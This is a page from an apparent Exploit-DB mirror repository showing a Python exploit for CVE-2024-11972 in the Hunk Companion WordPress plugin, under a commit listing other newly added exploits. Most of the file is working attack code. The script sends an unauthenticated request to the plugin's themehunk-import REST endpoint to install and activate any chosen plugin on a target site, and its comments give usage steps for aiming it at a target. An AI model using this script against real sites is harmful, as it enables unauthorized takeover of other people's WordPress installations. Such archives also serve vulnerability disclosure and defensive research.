bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52259.py
Exploit-DB 8ce497b2c8 DB: 2025-04-19 
8 changes to exploits/shellcodes/ghdb

Langflow 1.3.0 -  Remote Code Execution (RCE)

Apache Commons Text  1.10.0 - Remote Code Execution

Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation

UJCMS 9.6.3 - User Enumeration via IDOR

Inventio Lite 4 - SQL Injection

KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection

Tatsu 3.3.11 - Unauthenticated RCE
2025-04-19 00:16:29 +00:00

65 lines
No EOL
2.1 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
# Exploits a flaw in the Hunk Companion plugin's permission_callback for the
# /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
# to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
# 1. Update `target_url` below with the target WordPress site's URL.
# 2. Update `plugin_name` with the slug of the plugin you want to install.
# 3. Run: python3 exploit.py
#
import requests
from urllib.parse import urljoin
# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"
# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"
endpoint = "/wp-json/hc/v1/themehunk-import"
url = urljoin(target_url, endpoint)
payload = {
"params": {
"plugin": {
plugin_name: "Plugin Label"
},
"allPlugins": [
{
plugin_name: f"{plugin_name}/{plugin_name}.php"
}
],
"themeSlug": "theme",
"proThemePlugin": "plugin",
"templateType": "free",
"tmplFreePro": "theme",
"wpUrl": target_url
}
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
"Content-Type": "application/json"
}
try:
response = requests.post(url, json=payload, headers=headers, timeout=10)
response.raise_for_status() # Raises an HTTPError if the response is not 2xx
print(f"[+] Exploit sent successfully.")
print(f"Response Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
Reference in a new issue View git blame Copy permalink